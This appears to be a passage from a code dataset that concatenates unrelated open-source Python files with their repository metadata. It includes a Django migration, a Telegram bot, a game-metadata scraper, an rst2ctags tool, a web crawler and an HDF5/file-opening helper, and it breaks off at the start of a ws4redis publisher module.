'office': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'person_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['profiles.Person']", 'unique': 'True', 'primary_key': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'profiles.person': {
'Meta': {'object_name': 'Person'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'cv': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'n_number': ('django.db.models.fields.CharField', [], {'max_length': '9'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.Project']", 'null': 'True', 'blank': 'True'}),
'tags': ('tagging.fields.TagField', [], {}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'use_which_cv': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'user_account': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'person_profile'", 'unique': 'True', 'null': 'True', 'to': "orm['auth.User']"})
},
'profiles.program': {
'Meta': {'object_name': 'Program'},
'abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'school': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.School']", 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.project': {
'Meta': {'object_name': 'Project'},
'collaborators': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'course': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']", 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Person']", 'null': 'True', 'blank': 'True'}),
'creator_type': ('django.db.models.fields.CharField', [], {'default': "'I'", 'max_length': '2'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'format': ('tagging.fields.TagField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'participating_faculty': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['profiles.FacultyMember']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'ref_type': ('django.db.models.fields.CharField', [], {'default': "'I'", 'max_length': '2'}),
'scope_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'specifications': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('tagging.fields.TagField', [], {}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Untitled'", 'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'})
},
'profiles.school': {
'Meta': {'object_name': 'School'},
'abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'division': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Division']", 'null': 'True', 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.section': {
'Meta': {'object_name': 'Section'},
'course': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'crn': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '4'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instructors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.FacultyMember']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.Project']", 'null': 'True', 'blank': 'True'}),
'semester': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Semester']"}),
'syllabus': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'syllabus_orig_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.semester': {
'Meta': {'object_name': 'Semester'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'profiles.student': {
'Meta': {'object_name': 'Student', '_ormbases': ['profiles.Person']},
'person_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['profiles.Person']", 'unique': 'True', 'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'profiles.subject': {
'Meta': {'object_name': 'Subject'},
'abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Program']", 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.workimage': {
'Meta': {'object_name': 'WorkImage'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Person']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'profiles.workurl': {
'Meta': {'object_name': 'WorkURL'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Person']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['profiles']
|
agpl-3.0
| 2,768,419,188,654,010,400
| 80.905138
| 196
| 0.545025
| false
| 3.593826
| false
| false
| false
|
Paco1994/sportbot
|
sportbot/bot.py
|
1
|
1953
|
# -*- coding: utf-8 -*-
import telebot # Librería de la API del bot.
import random
from telebot import types # Tipos para la API del bot.
import time # Librería para hacer que el programa que controla el bot no se acabe.
import sys
from sportbot import bot
reload(sys)
sys.setdefaultencoding("utf-8")
local = True
gif = "https://lachatupdate.files.wordpress.com/2015/08/547b7a894bcc7.gif"
#usuarios = [line.rstrip('\n') for line in open('sources/usuarios.txt')] #cargamos la lista de usuarios
administrador = '-24696186'
commands = { # command description used in the "help" command
'start': 'Empieza a usar el bot. Recibirás notificaciones globales cuando se actualice el bot.',
'help': 'Muestra el menú de ayuda.'
}
def listener(messages):
for m in messages:
cid = m.chat.id
mensaje = ""
if m.content_type == 'text': # Sólo saldrá en el log los mensajes tipo texto
if cid > 0:
mensaje = str(m.chat.first_name) + "[" + str(cid) + "]: " + m.text
#f = open('sources/log.txt', 'a')
#f.write(mensaje + "\n")
#f.close()
print mensaje
else:
if m.text[0] == '/':
mensaje = str(m.from_user.first_name) + "[" + str(cid) + "]: " + m.text
#f = open('sources/log.txt', 'a')
#f.write(mensaje + "\n")
#f.close()
print mensaje
bot.set_update_listener(listener) # Así, le decimos al bot que utilice como función escuchadora nuestra función 'listener' declarada arriba.
bot.polling(none_stop=True) # Con esto, le decimos al bot que siga funcionando incluso si encuentra algún fallo.
while True: # Ahora le decimos al programa que no se cierre haciendo un bucle que siempre se ejecutará.
#listadoURLs = ini2urls("sources/url.ini",0) # Lectura de URL desde fichero de INICIO
time.sleep(300)
|
gpl-3.0
| -2,492,374,418,671,157,000
| 39.458333
| 140
| 0.616375
| false
| 2.992296
| false
| false
| false
|
topfs2/heimdall
|
src/thegamesdb.py
|
1
|
5883
|
import heimdall
from heimdall import tasks
from heimdall import resources
from heimdall import supplies, demands
from heimdall.predicates import *
from game_item import comparePlatforms
import datetime
import difflib
import urllib
import xml.etree.ElementTree as ET
baseImageUrl = "http://thegamesdb.net/banners/"
def readTextElement(parent, elementName):
element = parent.find(elementName)
return element.text if (element != None and element.text != None) else ''
class GamePredicateObject(tasks.SubjectTask):
demand = [
demands.required(dc.identifier, "http://thegamesdb.net/game/"),
]
supply = [
supplies.emit(dc.title),
supplies.emit(dc.type),
supplies.emit(dc.description),
supplies.emit(dc.date),
supplies.emit(media.rating),
supplies.emit(swo.SWO_0000396), # Developer
supplies.emit(swo.SWO_0000397), # Publisher
supplies.emit(edamontology.data_3106), # Platform
supplies.emit("players"),
supplies.emit(foaf.thumbnail),
supplies.emit("fanart"),
supplies.emit("banner"),
supplies.emit("trailer"),
]
def require(self):
uri = self.subject[dc.identifier]
ID = uri[len("http://thegamesdb.net/game/"):]
return resources.SimpleResource("http://thegamesdb.net/api/GetGame.php?id=" + ID)
def run(self, resource):
root = ET.fromstring(resource)
gameRows = root.findall("Game")
if gameRows:
gameRow = gameRows[0]
gameTitle = readTextElement(gameRow, "GameTitle")
self.subject.emit(dc.title, gameTitle)
for genre in gameRow.findall("Genres/genre"):
self.subject.emit(dc.type, genre.text)
self.subject.emit(dc.description, readTextElement(gameRow, "Overview"))
try:
# Deserialize MM/DD/YYYY
dateobject = datetime.datetime.strptime(readTextElement(gameRow, "ReleaseDate"), "%m/%d/%Y")
self.subject.emit(dc.date, dateobject.strftime("%Y-%m-%d"))
except ValueError:
# can't be parsed by strptime()
pass
self.subject.emit(media.rating, readTextElement(gameRow, 'ESRB'))
self.subject.emit(swo.SWO_0000396, readTextElement(gameRow, 'Developer'))
self.subject.emit(swo.SWO_0000397, readTextElement(gameRow, 'Publisher'))
self.subject.emit(edamontology.data_3106, readTextElement(gameRow, 'Platform'))
self.subject.emit("players", readTextElement(gameRow, 'Players'))
for boxartRow in gameRow.findall('Images/boxart'):
side = boxartRow.attrib.get('side')
if side == 'front' and boxartRow.text:
self.subject.emit(foaf.thumbnail, baseImageUrl + boxartRow.text)
for fanartRow in gameRow.findall('Images/fanart'):
original = readTextElement(fanartRow, 'original')
if original:
thumb = readTextElement(fanartRow, 'thumb')
if thumb:
self.subject.emit("fanart", {"fanart": baseImageUrl + original, "thumbnail": baseImageUrl + thumb})
else:
self.subject.emit("fanart", baseImageUrl + original)
for bannerRow in gameRow.findall('Images/banner'):
self.subject.emit("banner", baseImageUrl + bannerRow.text)
self.subject.emit("trailer", readTextElement(gameRow, 'Youtube'))
def readTextElement(self, parent, elementName):
element = parent.find(elementName)
return element.text if (element != None and element.text != None) else ''
class SearchGameCollector(tasks.SubjectTask):
demand = [
demands.required(dc.title),
demands.required(edamontology.data_3106), # Platform
demands.requiredClass("item.game", True),
demands.none(owl.sameAs, "http://thegamesdb.net/game/[0-9]*")
]
supply = [
supplies.emit(owl.sameAs, "http://thegamesdb.net/game/")
]
def require(self):
title = self.subject[dc.title]
platform = self.translatePlatform(self.subject[edamontology.data_3106])
if platform:
uri = "http://thegamesdb.net/api/GetGame.php?name=%s&platform=%s" % \
(urllib.quote_plus(title), urllib.quote_plus(platform))
return resources.SimpleResource(uri)
else:
return []
def run(self, resource):
root = ET.fromstring(resource)
gameRows = root.findall("Game")
# TheGamesDB has search ordering problems. Sucks for XML scrapers... not for difflib!
possibilities = [readTextElement(gameRow, "GameTitle") for gameRow in gameRows]
gameTitle = difflib.get_close_matches(self.subject[dc.title], possibilities, 1)
if gameTitle:
gameTitle = gameTitle[0]
for gameRow in gameRows:
if gameTitle == readTextElement(gameRow, "GameTitle"):
gameId = readTextElement(gameRow, "id")
if gameId:
self.subject.emit(owl.sameAs, "http://thegamesdb.net/game/" + gameId)
break
def translatePlatform(self, platform):
uri = "http://thegamesdb.net/api/GetPlatformsList.php"
resource = resources.CachedSimpleResource(uri)
platformXML = resource.run(resource.require())
root = ET.fromstring(platformXML)
for tgdb_platform in root.findall("Platforms/Platform"):
nametag = tgdb_platform.find("name")
if nametag == None or nametag.text == None:
continue
if comparePlatforms(nametag.text, platform):
return nametag.text
return None
module = [ GamePredicateObject, SearchGameCollector ]
|
gpl-2.0
| 1,302,008,425,335,843,600
| 40.723404
| 123
| 0.617372
| false
| 3.90897
| false
| false
| false
|
jszakmeister/rst2ctags
|
rst2ctags.py
|
1
|
11006
|
#!/usr/bin/env python
# Copyright (C) 2013-2018 John Szakmeister <john@szakmeister.net>
# All rights reserved.
#
# This software is licensed as described in the file LICENSE.txt, which
# you should have received as part of this distribution.
from __future__ import absolute_import
from __future__ import print_function
import codecs
import errno
import io
import locale
import pkg_resources
import sys
import re
def _version():
'''Get version.'''
try:
return pkg_resources.get_distribution('rst2ctags').version
except pkg_resources.DistributionNotFound:
return 'dev'
__version__ = _version()
class ScriptError(Exception):
pass
def detect_encoding(filename):
with open(filename, 'rb') as f:
raw = f.read(4096)
potential_bom = raw[:4]
bom_encodings = [('utf-8-sig', codecs.BOM_UTF8),
('utf-16', codecs.BOM_UTF16_LE),
('utf-16', codecs.BOM_UTF16_BE),
('utf-32', codecs.BOM_UTF32_LE),
('utf-32', codecs.BOM_UTF32_BE)]
for encoding, bom in bom_encodings:
if potential_bom.startswith(bom):
return encoding
# No BOM found, let's try to detect encoding
encoding = None
try:
import chardet
result = chardet.detect(raw)
# If we're not really confident about the encoding, then skip to
# UTF-8 detection.
if result['confidence'] >= 0.9:
encoding = result['encoding']
if encoding == 'ascii':
encoding = 'utf-8'
except ImportError:
pass
if encoding is None:
try:
raw.rsplit(b' ')[0].decode('utf-8')
encoding = 'utf-8'
except UnicodeDecodeError:
pass
return encoding or 'latin1'
def open_autoenc(filename, encoding=None):
if encoding is None:
encoding = detect_encoding(filename)
return io.open(filename, encoding=encoding, newline='')
def ctag_name_escape(str):
str = re.sub('[\t\r\n]+', ' ', str)
str = re.sub(r'^\s*\\\((.)\)', r'(\1)', str)
return str
def ctag_search_escape(str):
str = str.replace('\\', r'\\')
str = str.replace('\t', r'\t')
str = str.replace('\r', r'\r')
str = str.replace('\n', r'\n')
for c in '[]*$.^':
str = str.replace(c, '\\' + c)
return str
class Tag(object):
def __init__(self, tag_name, tag_file, tag_address):
self.tag_name = tag_name
self.tag_file = tag_file
self.tag_address = tag_address
self.fields = []
def add_field(self, type, value=None):
if type == 'kind':
type = None
self.fields.append((type, value or ""))
def format_fields(self):
formattedFields = []
for name, value in self.fields:
if name:
s = '%s:%s' % (name, value or "")
else:
s = str(value)
formattedFields.append(s)
return '\t'.join(formattedFields)
def render(self):
return '%s\t%s\t%s;"\t%s' % (
self.tag_name, self.tag_file, self.tag_address, self.format_fields())
def __repr__(self):
return "<Tag name:%r file:%r: addr:%r %r>" % (
self.tag_name, self.tag_file, self.tag_address,
self.format_fields().replace('\t', ' '))
def _tuple(self):
return (self.tag_name, self.tag_file, self.tag_address,
self.format_fields())
def __eq__(self, other):
return self._tuple() == other._tuple()
def __ne__(self, other):
return self._tuple() != other._tuple()
def __lt__(self, other):
return self._tuple() < other._tuple()
def __le__(self, other):
return self._tuple() <= other._tuple()
def __gt__(self, other):
return self._tuple() > other._tuple()
def __ge__(self, other):
return self._tuple() >= other._tuple()
@staticmethod
def section(section, sro):
tag_name = ctag_name_escape(section.name)
tag_address = '/^%s$/' % ctag_search_escape(section.line)
t = Tag(tag_name, section.filename, tag_address)
t.add_field('kind', 's')
t.add_field('line', section.lineNumber)
parents = []
p = section.parent
while p is not None:
parents.append(ctag_name_escape(p.name))
p = p.parent
parents.reverse()
if parents:
t.add_field('section', sro.join(parents))
return t
class Section(object):
def __init__(self, level, name, line, lineNumber, filename, parent=None):
self.level = level
self.name = name
self.line = line
self.lineNumber = lineNumber
self.filename = filename
self.parent = parent
def __repr__(self):
return '<Section %s %d %d>' % (self.name, self.level, self.lineNumber)
def pop_sections(sections, level):
while sections:
s = sections.pop()
if s and s.level < level:
sections.append(s)
return
heading_re = re.compile(r'''^([-=~:^"#*._+`'])\1+$''')
subject_re = re.compile(r'^[^\s]+.*$')
def find_sections(filename, lines):
sections = []
previousSections = []
level_values = {}
level = 0
for i, line in enumerate(lines):
if i == 0:
continue
if heading_re.match(line) and subject_re.match(lines[i - 1]):
if i >= 2:
topLine = lines[i-2]
else:
topLine = ''
# If the heading line is to short, then docutils doesn't consider
# it a heading.
if len(line) < len(lines[i-1]):
continue
name = lines[i-1].strip()
key = line[0]
if heading_re.match(topLine):
# If there is an overline, it must match the bottom line.
if topLine != line:
# Not a heading.
continue
# We have an overline, so double up.
key = key + key
if key not in level_values:
level_values[key] = level + 1
level = level_values[key]
pop_sections(previousSections, level)
if previousSections:
parent = previousSections[-1]
else:
parent = None
lineNumber = i
s = Section(level, name, lines[i-1], lineNumber,
filename, parent)
previousSections.append(s)
sections.append(s)
# Blank lines to help correctly detect:
# foo
# ===
# bar
# ===
#
# as two underline style headings.
lines[i] = lines[i-1] = ''
if topLine:
lines[i-2] = ''
return sections
def sections_to_tags(sections, sro):
tags = []
for section in sections:
tags.append(Tag.section(section, sro))
return tags
def gen_tags_header(output, sort):
if sort == "yes":
sortedLine = b'!_TAG_FILE_SORTED\t1\t//\n'
elif sort == "foldcase":
sortedLine = b'!_TAG_FILE_SORTED\t2\t//\n'
else:
sortedLine = b'!_TAG_FILE_SORTED\t0\t//\n'
output.write(b'!_TAG_FILE_ENCODING\tutf-8\t//\n')
output.write(b'!_TAG_FILE_FORMAT\t2\t//\n')
output.write(sortedLine)
def gen_tags_content(output, sort, tags):
if sort == "yes":
tags = sorted(tags)
elif sort == "foldcase":
tags = sorted(tags, key=lambda x: str(x).lower())
for t in tags:
output.write(t.render().encode('utf-8'))
output.write('\n'.encode('utf-8'))
def main():
from optparse import OptionParser
parser = OptionParser(usage="usage: %prog [options] file(s)",
version=__version__)
parser.add_option(
"-f", "--file", metavar="FILE", dest="tagfile",
default="tags",
help='Write tags into FILE (default: "tags"). Use "-" to write '
'tags to stdout.')
parser.add_option(
"", "--encoding", metavar="ENCODING", dest="encoding",
default=None,
help='Skips auto detection and uses the specified encoding for the '
'input files. Encoding name should be one that Python would '
'recognize.')
parser.add_option(
"", "--sort", metavar="[yes|foldcase|no]", dest="sort",
choices=["yes", "no", "foldcase"],
default="yes",
help='Produce sorted output. Acceptable values are "yes", '
'"no", and "foldcase". Default is "yes".')
parser.add_option(
"", "--sro", metavar="SEPARATOR", dest="sro",
default="|", action="store",
help=u'Use the specified string to scope nested headings. The '
'default is pipe symbol ("|"), but that can be an issue if your '
'headings contain the pipe symbol. It might be more useful to '
'use a such as the UTF-8 chevron ("\u00bb").')
options, args = parser.parse_args()
if not args:
raise ScriptError("No input files specified.")
if sys.version_info[0] == 2:
encoding = sys.stdin.encoding or locale.getpreferredencoding() or 'utf-8'
options.sro = options.sro.decode(encoding)
if options.tagfile == '-':
if sys.version_info[0] == 2:
output = sys.stdout
else:
output = sys.stdout.buffer
else:
output = open(options.tagfile, 'wb')
gen_tags_header(output, options.sort)
all_sections = []
try:
for filename in args:
if sys.version_info[0] == 2:
filename = filename.decode(sys.getfilesystemencoding())
try:
with open_autoenc(filename, encoding=options.encoding) as f:
buf = f.read()
except IOError as e:
if e.errno == errno.EPIPE:
raise
print_warning(e)
continue
lines = buf.splitlines()
del buf
sections = find_sections(filename, lines)
all_sections.extend(sections)
finally:
# We do this to match ctags behavior... even when a file is missing,
# it'll write out the tags it has.
gen_tags_content(output,
options.sort,
sections_to_tags(all_sections, options.sro))
output.flush()
output.close()
def print_warning(e):
print("WARNING: %s" % str(e), file=sys.stderr)
def print_error(e):
print("ERROR: %s" % str(e), file=sys.stderr)
def cli_main():
try:
main()
except IOError as e:
if e.errno == errno.EPIPE:
# Exit saying we got SIGPIPE.
sys.exit(141)
print_error(e)
sys.exit(1)
except ScriptError as e:
print_error(e)
sys.exit(1)
if __name__ == '__main__':
cli_main()
|
bsd-3-clause
| 7,713,842,127,701,343,000
| 26.58396
| 81
| 0.535344
| false
| 3.787337
| false
| false
| false
|
Starofall/RTX
|
rtxlib/executionstrategy/__init__.py
|
1
|
2569
|
from rtxlib.executionstrategy.ForeverStrategy import start_forever_strategy
from rtxlib.executionstrategy.StepStrategy import start_step_strategy
from rtxlib.executionstrategy.SelfOptimizerStrategy import start_self_optimizer_strategy
from rtxlib.executionstrategy.SequencialStrategy import start_sequential_strategy
from rtxlib import log_results, error, info
from rtxlib.executionstrategy.UncorrelatedSelfOptimizerStrategy import start_uncorrelated_self_optimizer_strategy
def run_execution_strategy(wf):
""" we run the correct execution strategy """
applyInitKnobs(wf)
try:
# start the right execution strategy
if wf.execution_strategy["type"] == "sequential":
log_results(wf.folder, wf.execution_strategy["knobs"][0].keys() + ["result"], append=False)
start_sequential_strategy(wf)
elif wf.execution_strategy["type"] == "self_optimizer":
log_results(wf.folder, wf.execution_strategy["knobs"].keys() + ["result"], append=False)
start_self_optimizer_strategy(wf)
elif wf.execution_strategy["type"] == "uncorrelated_self_optimizer":
log_results(wf.folder, wf.execution_strategy["knobs"].keys() + ["result"], append=False)
start_uncorrelated_self_optimizer_strategy(wf)
elif wf.execution_strategy["type"] == "step_explorer":
log_results(wf.folder, wf.execution_strategy["knobs"].keys() + ["result"], append=False)
start_step_strategy(wf)
elif wf.execution_strategy["type"] == "forever":
start_forever_strategy(wf)
except RuntimeError:
error("Stopped the whole workflow as requested by a RuntimeError")
# finished
info(">")
applyDefaultKnobs(wf)
def applyInitKnobs(wf):
""" we are done, so revert to default if given """
if "pre_workflow_knobs" in wf.execution_strategy:
try:
info("> Applied the pre_workflow_knobs")
wf.change_provider["instance"] \
.applyChange(wf.change_event_creator(wf.execution_strategy["pre_workflow_knobs"]))
except:
error("apply changes did not work")
def applyDefaultKnobs(wf):
""" we are done, so revert to default if given """
if "post_workflow_knobs" in wf.execution_strategy:
try:
info("> Applied the post_workflow_knobs")
wf.change_provider["instance"] \
.applyChange(wf.change_event_creator(wf.execution_strategy["post_workflow_knobs"]))
except:
error("apply changes did not work")
|
mit
| 7,610,358,323,314,089,000
| 41.816667
| 113
| 0.669132
| false
| 4.001558
| false
| false
| false
|
niteeshsood/LoktraTest
|
webcrawler.py
|
1
|
1769
|
import urllib2
from bs4 import BeautifulSoup
import getopt
import sys
import pdb
def makeint(s):
s.strip()
ans=0
for i in xrange(len(s)):
if s[i].isdigit():
ans=10*ans+int(s[i])
return ans
def main(argv):
try:
opts, args = getopt.getopt(argv,'hp:k:', )
if len(opts) == 0:
print 'Use python webcrawler.py -h for help'
sys.exit(2)
except getopt.GetoptError:
print 'Use python webcrawler.py -h for help'
sys.exit(2)
for op,ar in opts:
if op == '-p':
try:
int(ar)
except ValueError:
print 'Error. Page number should be a number'
sys.exit(2)
pageno = ar
elif op == '-k':
keyword = ar
elif op == '-h':
print 'Use python webcrawler.py -p pagenumber -k keyword'
sys.exit(2)
else: assert False, 'unhandled option'
if 'keyword' not in locals():
print 'Keyword not specified try again'
sys.exit(2)
if 'pageno' in locals():
test = 'http://www.shopping.com/products~PG-'+str(pageno)+'?KW='+str(keyword)
else:
test = 'http://www.shopping.com/products?KW=' + str(keyword)
page = urllib2.urlopen(test).read()
soup = BeautifulSoup(page)
if soup.body['id'] == 'noResults':
print 'No results for this keyword'
sys.exit(1)
else:
alltext = soup.get_text()
res = alltext[alltext.find('Results '): alltext.find('Results ')+25]
if 'pageno' in locals():
firstno = makeint(res[res.find('Results ')+8: res.find('-')-1])
lastno = makeint(res[res.find('-')+2:res.find('of ')])
print 'Number of results on page', pageno, ':', lastno-firstno+1
else:
print 'Number of results found', res[res.find('of ')+3:res.find('\n')]
if __name__ == '__main__':
main(sys.argv[1:])
|
gpl-3.0
| -1,612,103,384,303,443,200
| 24.637681
| 81
| 0.594686
| false
| 3.153298
| false
| false
| false
|
dkriegner/xrayutilities
|
lib/xrayutilities/io/helper.py
|
1
|
3315
|
# This file is part of xrayutilities.
#
# xrayutilities is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
# Copyright (C) 2013-2019 Dominik Kriegner <dominik.kriegner@gmail.com>
"""
convenience functions to open files for various data file reader
these functions should be used in new parsers since they transparently allow to
open gzipped and bzipped files
"""
import bz2
import gzip
import lzma
import h5py
from .. import config
from ..exception import InputError
def xu_open(filename, mode='rb'):
"""
function to open a file no matter if zipped or not. Files with extension
'.gz', '.bz2', and '.xz' are assumed to be compressed and transparently
opened to read like usual files.
Parameters
----------
filename : str
filename of the file to open (full including path)
mode : str, optional
mode in which the file should be opened
Returns
-------
file-handle
handle of the opened file
Raises
------
IOError
If the file does not exist an IOError is raised by the open routine,
which is not caught within the function
"""
if config.VERBOSITY >= config.INFO_ALL:
print("XU:io: opening file %s" % filename)
if filename.endswith('.gz'):
fid = gzip.open(filename, mode)
elif filename.endswith('.bz2'):
fid = bz2.BZ2File(filename, mode)
elif filename.endswith('.xz'):
fid = lzma.open(filename, mode)
else:
fid = open(filename, mode)
return fid
class xu_h5open(object):
"""
helper object to decide if a HDF5 file has to be opened/closed when
using with a 'with' statement.
"""
def __init__(self, f, mode='r'):
"""
Parameters
----------
f : str
filename or h5py.File instance
mode : str, optional
mode in which the file should be opened. ignored in case a file
handle is passed as f
"""
self.closeFile = True
self.fid = None
self.mode = mode
if isinstance(f, h5py.File):
self.fid = f
self.closeFile = False
self.filename = f.filename
elif isinstance(f, str):
self.filename = f
else:
raise InputError("f argument of wrong type was passed, "
"should be string or filename")
def __enter__(self):
if self.fid:
if not self.fid.id.valid:
self.fid = h5py.File(self.filename, self.mode)
else:
self.fid = h5py.File(self.filename, self.mode)
return self.fid
def __exit__(self, type, value, traceback):
if self.closeFile:
self.fid.close()
|
gpl-2.0
| 4,533,434,051,202,780,700
| 28.336283
| 79
| 0.622624
| false
| 4.0625
| false
| false
| false
|
jrief/django-websocket-redis
|
ws4redis/publisher.py
|
2
|
2898
|
#-*- coding: utf-8 -*-
from redis import ConnectionPool, StrictRedis
from ws4redis import settings
from ws4redis.redis_store import RedisStore
from ws4redis._compat import is_authenticated
from redis.connection import UnixDomainSocketConnection
if 'unix_socket_path' in settings.WS4REDIS_CONNECTION:
# rename 'unix_socket_path' to 'path' and pass as args
